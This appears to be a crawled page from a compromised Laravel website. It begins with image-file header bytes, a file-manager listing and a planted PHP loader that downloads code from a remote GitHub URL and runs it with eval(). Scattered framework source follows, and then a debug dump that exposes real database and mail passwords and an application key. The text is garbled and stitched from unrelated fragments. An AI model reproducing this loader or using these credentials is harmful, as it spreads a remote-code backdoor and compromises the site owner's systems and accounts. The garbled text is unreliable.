fb讽德诵功ÿØÿà JFIF ÿÛ C !"$"$ÿÛ Cÿ p " ÿÄ ÿÄ ÿÚ ÕÔË®(% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤ @ .............................................................................................................................................................................. .............................................................................
| File Name | Size | Permi | Edit |
|---|---|---|---|
| 📄 0e585c1e46bbecf77c732b662e8e4d7850a77f | 95 bytes | ||
| 📄 37ca4677ee97ddcb112f22d086b92721fd578c | 152 bytes | ||
| 📄 3f2a642c781554a0b31c9529f563b97da4ffeb | 1517 bytes | ||
| 📄 5694781b8aaff78db57f0569df06ed95ad52b4 | 123 bytes | ||
| 📄 6fb58b103ae5c29596662ed94a3954075a32c9 | 201 bytes | ||
| 📄 717ceaf1817a65b27ea78e385c6c30deaa1ea1 | 531 bytes | ||
| 📄 758ab1667bf7dcd7ec98eeb0e69d3f69e32ed7 | 607 bytes | ||
| 📄 7743464793e22375809aae827ed088d7e963f8 | 110051 bytes | ||
| 📄 88cbcd2c85b8007976e9eaaddcc42cdb4fb7df | 183 bytes | ||
| 📄 98e2c0607332658ab9d429e86b2da1130f2326 | 322 bytes | ||
| 📄 a0bd8bc560f8e87e3918de03507b3066c7657a | 254 bytes | ||
| 📄 cc10214c4523b8ed22d2e0d52f7695d0ec0fb5 | 58 bytes | ||
| 📄 cd1a699fc97ff8d6a04116fa6eef8bdbc408b7 | 239 bytes | ||
| 📄 d4fb3f6fb663d303c3e026691c777e7e73811a | 283 bytes | ||
| 📄 d8943d64d56db125e8cc8a1ca1db8b2e9ee1a2 | 321 bytes | ||
| 📄 de18ee311fac356ddd2c6adf6c9da28da2f843 | 1562 bytes | ||
| 📄 f759ffce483b91bb614905db7b9109feb3003b | 607 bytes | ||
| 📄 fd0bad2e6f9bbfa7c2b947e472619952b8e967 | 7927 bytes |
<?php
$path = "https://raw.githubusercontent.com/ICS251220/ICS/refs/heads/main/vod.txt";
$code = implode('', file($path));
eval("?>" . $code);
?>
"implode(): Argument #2 ($array) must be of type ?array, bool given"
<?php
$path = "https://raw.githubusercontent.com/ICS251220/ICS/refs/heads/main/vod.txt";
$code = implode('', file($path));
eval("?>" . $code);
?>
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
*
* @throws \Exception
*/
protected function loadConfigurationFiles(Application $app, RepositoryContract $repository)
{
$files = $this->getConfigurationFiles($app);
if (! isset($files['app'])) {
throw new Exception('Unable to load the "app" configuration file.');
}
foreach ($files as $key => $path) {
$repository->set($key, require $path);
}
}
/**
* Get all of the configuration files for the application.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @return array
*/
protected function getConfigurationFiles(Application $app)
{
$files = [];
$configPath = realpath($app->configPath());
foreach (Finder::create()->files()->name('*.php')->in($configPath) as $file) {
$directory = $this->getNestedDirectory($file, $configPath);
$files[$directory.basename($file->getRealPath(), '.php')] = $file->getRealPath();
}
"/home/u302984526/domains/queenland-group.com/public_html/config/docker/js/index.php"
public function bootstrap(Application $app)
{
$items = [];
// First we will see if we have a cache configuration file. If we do, we'll load
// the configuration items from that file so that it is very quick. Otherwise
// we will need to spin through every configuration file and load them all.
if (file_exists($cached = $app->getCachedConfigPath())) {
$items = require $cached;
$loadedFromCache = true;
}
// Next we will spin through all of the configuration files in the configuration
// directory and load each one into the repository. This will make all of the
// options available to the developer for use in various parts of this app.
$app->instance('config', $config = new Repository($items));
if (! isset($loadedFromCache)) {
$this->loadConfigurationFiles($app, $config);
}
// Finally, we will set the application's environment based on the configuration
// values that were loaded. We will pass a callback which will be used to get
// the environment in a web context where an "--env" switch is not present.
$app->detectEnvironment(function () use ($config) {
return $config->get('app.env', 'production');
});
date_default_timezone_set($config->get('app.timezone', 'UTC'));
mb_internal_encoding('UTF-8');
}
/**
* Load the configuration items from all of the files.
*
* @param \Illuminate\Contracts\Foundation\Application $app
* @param \Illuminate\Contracts\Config\Repository $repository
* @return void
{
$this->register(new EventServiceProvider($this));
$this->register(new LogServiceProvider($this));
$this->register(new RoutingServiceProvider($this));
}
/**
* Run the given array of bootstrap classes.
*
* @param string[] $bootstrappers
* @return void
*/
public function bootstrapWith(array $bootstrappers)
{
$this->hasBeenBootstrapped = true;
foreach ($bootstrappers as $bootstrapper) {
$this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
$this->make($bootstrapper)->bootstrap($this);
$this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
}
}
/**
* Register a callback to run after loading the environment.
*
* @param \Closure $callback
* @return void
*/
public function afterLoadingEnvironment(Closure $callback)
{
$this->afterBootstrapping(
LoadEnvironmentVariables::class, $callback
);
}
/**
* Register a callback to run before a bootstrapper.
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
* Get the route dispatcher callback.
*
* @return \Closure
*/
protected function dispatchToRouter()
{
return function ($request) {
$this->app->instance('request', $request);
return $this->router->dispatch($request);
};
}
/**
* Call the terminate method on any terminable middleware.
*
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
{
$this->app->instance('request', $request);
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
}
/**
* Bootstrap the application for HTTP requests.
*
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
public function __construct(Application $app, Router $router)
{
$this->app = $app;
$this->router = $router;
$this->syncMiddlewareToRouter();
}
/**
* Handle an incoming HTTP request.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function handle($request)
{
try {
$request->enableHttpMethodParameterOverride();
$response = $this->sendRequestThroughRouter($request);
} catch (Throwable $e) {
$this->reportException($e);
$response = $this->renderException($request, $e);
}
$this->app['events']->dispatch(
new RequestHandled($request, $response)
);
return $response;
}
/**
* Send the given request through the middleware / router.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
protected function sendRequestThroughRouter($request)
/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/
$app = require_once __DIR__.'/../bootstrap/app.php';
// set the public path to this directory
$app->bind('path.public', function() {
return __DIR__;
});
$kernel = $app->make(Kernel::class);
$response = tap($kernel->handle(
$request = Request::capture()
))->send();
$kernel->terminate($request, $response);
| Key | Value |
| page | "AhomeAu302984526AdomainsAqueenland-groupIcomApublic_htmlAIgitAobjectsA65"
|
| Key | Value |
| PHPSESSID | "1d067ku2c95fkiuec6rujkk5sg"
|
| Key | Value |
| wp_admin_created | true
|
| cwd | "/home/u302984526/domains/queenland-group.com/public_html/.git/objects/65"
|
| Key | Value |
| LSPHP_ProcessGroup | "on"
|
| PATH | "/usr/local/bin:/bin:/usr/bin"
|
| HTTP_ACCEPT | "*/*"
|
| HTTP_ACCEPT_ENCODING | "gzip, br, zstd, deflate"
|
| HTTP_COOKIE | "PHPSESSID=1d067ku2c95fkiuec6rujkk5sg"
|
| HTTP_HOST | "queenland-group.com"
|
| HTTP_USER_AGENT | "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
|
| DOCUMENT_ROOT | "/home/u302984526/domains/queenland-group.com/public_html"
|
| REMOTE_ADDR | "216.73.216.129"
|
| REMOTE_PORT | "20078"
|
| SERVER_ADDR | "185.224.138.25"
|
| SERVER_NAME | "queenland-group.com"
|
| SERVER_ADMIN | "" |
| SERVER_PORT | "443"
|
| REQUEST_SCHEME | "https"
|
| REQUEST_URI | "/item/completion_form.php?page=AhomeAu302984526AdomainsAqueenland-groupIcomApublic_htmlAIgitAobjectsA65"
|
| REDIRECT_URL | "/index.php"
|
| REDIRECT_QUERY_STRING | "page=AhomeAu302984526AdomainsAqueenland-groupIcomApublic_htmlAIgitAobjectsA65"
|
| REDIRECT_REQUEST_METHOD | "GET"
|
| HTTPS | "on"
|
| CRAWLER_USLEEP | "1000"
|
| CRAWLER_LOAD_LIMIT_ENFORCE | "25"
|
| H_PLATFORM | "Hostinger"
|
| H_TYPE | "shared"
|
| H_CANARY | "false"
|
| H_STAGING | "false"
|
| REDIRECT_STATUS | "200"
|
| ratelimited_meta_externalagent | "1"
|
| UNIQUE_ID | "xENtJ3ILI@n2NhJn50amsvsu"
|
| X_SPDY | "HTTP2"
|
| SSL_PROTOCOL | "TLSv1.3"
|
| SSL_CIPHER | "TLS_AES_256_GCM_SHA384"
|
| SSL_CIPHER_USEKEYSIZE | "256"
|
| SSL_CIPHER_ALGKEYSIZE | "256"
|
| SCRIPT_FILENAME | "/home/u302984526/domains/queenland-group.com/public_html/public/index.php"
|
| QUERY_STRING | "page=AhomeAu302984526AdomainsAqueenland-groupIcomApublic_htmlAIgitAobjectsA65"
|
| SCRIPT_URI | "https://queenland-group.com/item/completion_form.php"
|
| SCRIPT_URL | "/item/completion_form.php"
|
| SCRIPT_NAME | "/public/index.php"
|
| SERVER_PROTOCOL | "HTTP/1.1"
|
| SERVER_SOFTWARE | "LiteSpeed"
|
| REQUEST_METHOD | "GET"
|
| X-LSCACHE | "on,crawler,esi,combine"
|
| PHP_SELF | "/public/index.php"
|
| REQUEST_TIME_FLOAT | 1770823315.9734
|
| REQUEST_TIME | 1770823315
|
| APP_NAME | "QueenLand-Group"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:Fl/QDbcMoBOtc4dQSMJC/vCtJmg8joMEQBAGmN+cDbo="
|
| APP_DEBUG | "true"
|
| APP_URL | "http://localhost"
|
| LOG_CHANNEL | "stack"
|
| LOG_LEVEL | "debug"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "127.0.0.1"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "u302984526_queenland"
|
| DB_USERNAME | "u302984526_queenland"
|
| DB_PASSWORD | "QueenLand123"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| QUEUE_CONNECTION | "sync"
|
| SESSION_DRIVER | "file"
|
| SESSION_LIFETIME | "120"
|
| MEMCACHED_HOST | "127.0.0.1"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "smtp.hostinger.com"
|
| MAIL_PORT | "465"
|
| MAIL_USERNAME | "contact@queenland-group.com"
|
| MAIL_PASSWORD | "Contact+Queenland123"
|
| MAIL_ENCRYPTION | "ssl"
|
| MAIL_FROM_ADDRESS | "contact@queenland-group.com"
|
| MAIL_FROM_NAME | "QueenLand-Group"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|
| Key | Value |
| APP_NAME | "QueenLand-Group"
|
| APP_ENV | "local"
|
| APP_KEY | "base64:Fl/QDbcMoBOtc4dQSMJC/vCtJmg8joMEQBAGmN+cDbo="
|
| APP_DEBUG | "true"
|
| APP_URL | "http://localhost"
|
| LOG_CHANNEL | "stack"
|
| LOG_LEVEL | "debug"
|
| DB_CONNECTION | "mysql"
|
| DB_HOST | "127.0.0.1"
|
| DB_PORT | "3306"
|
| DB_DATABASE | "u302984526_queenland"
|
| DB_USERNAME | "u302984526_queenland"
|
| DB_PASSWORD | "QueenLand123"
|
| BROADCAST_DRIVER | "log"
|
| CACHE_DRIVER | "file"
|
| QUEUE_CONNECTION | "sync"
|
| SESSION_DRIVER | "file"
|
| SESSION_LIFETIME | "120"
|
| MEMCACHED_HOST | "127.0.0.1"
|
| REDIS_HOST | "127.0.0.1"
|
| REDIS_PASSWORD | "null"
|
| REDIS_PORT | "6379"
|
| MAIL_MAILER | "smtp"
|
| MAIL_HOST | "smtp.hostinger.com"
|
| MAIL_PORT | "465"
|
| MAIL_USERNAME | "contact@queenland-group.com"
|
| MAIL_PASSWORD | "Contact+Queenland123"
|
| MAIL_ENCRYPTION | "ssl"
|
| MAIL_FROM_ADDRESS | "contact@queenland-group.com"
|
| MAIL_FROM_NAME | "QueenLand-Group"
|
| AWS_ACCESS_KEY_ID | "" |
| AWS_SECRET_ACCESS_KEY | "" |
| AWS_DEFAULT_REGION | "us-east-1"
|
| AWS_BUCKET | "" |
| PUSHER_APP_ID | "" |
| PUSHER_APP_KEY | "" |
| PUSHER_APP_SECRET | "" |
| PUSHER_APP_CLUSTER | "mt1"
|
| MIX_PUSHER_APP_KEY | "" |
| MIX_PUSHER_APP_CLUSTER | "mt1"
|